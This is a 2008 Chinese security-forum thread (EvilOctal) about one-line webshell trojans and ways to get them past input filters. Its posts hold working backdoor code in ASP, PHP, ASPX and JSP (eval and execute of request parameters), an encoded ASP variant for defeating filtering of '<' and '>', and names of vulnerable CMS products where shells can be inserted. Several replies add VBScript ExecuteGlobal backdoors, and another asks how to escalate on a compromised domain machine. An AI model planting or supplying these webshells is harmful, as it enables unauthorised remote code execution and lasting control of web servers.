邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]一句话木马的绕过过滤技巧 [查看完整版本]

awolf 2008-1-6 10:17

[讨论]一句话木马的绕过过滤技巧

文章作者：Awolf
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

  一句话木马在拿shell的时候总有很大作用，但是经常遇到这样情况：经过过滤后把我们小马都变了个某样了，让我们小菜素手无策！当然有人会说依情况而定，没错是这样的要灵活变通。这个帖子主要和大家讨论下一些常见的情况和如何绕过防注入的方法！让我们学习学习~~
   asp一句话：
[code]<%executerequest("p")%>[/code]
   php一句话：
[code]<?php eval($_POST[cmd];?>[/code]
  aspx一句话：
[code]<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>[/code]
jsp一句话：
[code]＜%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());
%＞[/code]
这里主要针对asp和php还有aspx的，这三个比较经常用！

pub!1c 2008-1-6 22:08

一句话的木马并不只是有这些.
脚本语言中大多数和系统交互的函数都能够用来作为后门.

安全性和可用性是不可逆的.

awolf 2008-1-7 21:42

恩，没错，只要我们好好分析充分利用 类似一句话木马可做后门的不只这些。
那么我主要想讨论是针对这些的一些常见的变形技术来达到免杀或者跳过过滤来插入小马。。

xinfulove 2008-1-8 00:43

问一句，没具体说怎么饶过过滤呀？漏啦？

billycrazy 2008-1-8 11:21

关于动易2005 ACCESS 顶部菜单设置 ----特效那里加一句话 被过滤 各位是否有招

asasok 2008-1-8 11:30

怎么绕，对什么情况使用什么绕法？

mlove 2008-1-8 16:59

*** 作者被禁止或删除 内容自动屏蔽 ***

xiaohao 2008-1-9 13:42

听的不是懂?? [s:289]

唐不狐 2008-1-9 16:13

本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的

awolf 2008-1-10 00:08

[quote]引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的[/quote]
恩，这里我只对asp做个简单的变形：
这个是针对于网站过滤了“<”，“>”等我们一句话木马要用到的关键字符，可以这样转换！
asp变形后成为[quote]┼攠數畣整爠煥敵瑳∨∣┩愾┼砧[/quote]
这样就绕过了，这个可以用在比如 沸腾注册的插马漏洞，还有现在最新的dvbbs8.1的后他拿shell在圈子设置处的插马。
至于php的还有aspx的还不是很懂，还需要大家帮忙。。。。。
当然asp也不只上面一种，还有很多种，比如转换ASCII码等等。。。。

seraph1984 2008-1-14 01:41

我来发一个我的变形
[code]
<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>
[/code]

jxsaqjh 2008-1-14 14:44

[quote]引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的[/quote]
不狐兄说的那篇文章哪里可以找到？

゛小︷帅！﹊ 2008-1-27 10:33

[code]<%On Error Resume Next eval request("xsser") %>[/code]

[s:263]

chinaitbo 2008-1-28 07:21

由于我刚注册账号，不能发贴，只好把我的问题跟贴求助大家了。
问题：拿到了一个SA注入点，通过阿D工具添加了一个管理员账号，用这个远程桌面登陆，问题就在那，能进去但显示跟去掉EXPLORER这个进程关掉一样的蓝色画面，通过ctrl+alt+del打开任务管理器，从上面的运行那里打开了CMD，但用net user 查看账号时，没有阿D添加的那个账号。通过调用MMC里添加active directory 用户和计算机里面的user项才有阿D添加的账号，我在里面把我的账号添加了domain administrator administrator,但还是没权限调用桌面出来。

看来这台机子已经用来做域用户了，但怎么才突破权限，怎么在这台本地登陆呢。通过阿D添加的账号是域账号，而不是本地账号。

softbug 2008-2-5 10:03

ExecuteGlobal ?

frg87895321 2008-2-12 19:15

<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>

这个留着当后门很好

消失再消失 2008-2-16 15:10

一句话  我一直没弄懂怎么去实现绕过闭合过率..
可能是我对asp不懂吧...
记得以前搞一个外挂站点的时候   过滤了<%.
  那时候还是骚总帮我解决的..
关注此帖....

查看完整版本: [讨论]一句话木马的绕过过滤技巧

© 1999-2008 EvilOctal Security Team